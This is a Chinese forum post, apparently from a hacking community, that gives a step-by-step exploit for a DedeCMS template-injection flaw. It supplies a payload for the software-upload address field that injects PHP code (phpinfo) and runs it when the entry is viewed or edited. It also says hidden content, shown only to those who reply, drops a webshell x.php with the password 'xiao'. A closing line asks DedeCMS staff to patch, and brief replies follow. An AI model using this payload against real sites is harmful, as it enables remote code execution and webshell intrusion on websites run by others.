大家知道新出了这个漏洞但是不知道怎么利用，我就装下大牛，
说下利用方法：注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行。

游客，如果您要查看本帖隐藏内容请回复

在当前目录生日x.php 密码为xiao  原语句 可以自己修改！


注册过程，省略，直接发表软件！目前还没有X.php，再点击更改软件！已经成功生成X.php

请织梦站长，，官方人员，看到后，请把补丁打上，谢谢 。。

kan kan  kan

   原来如此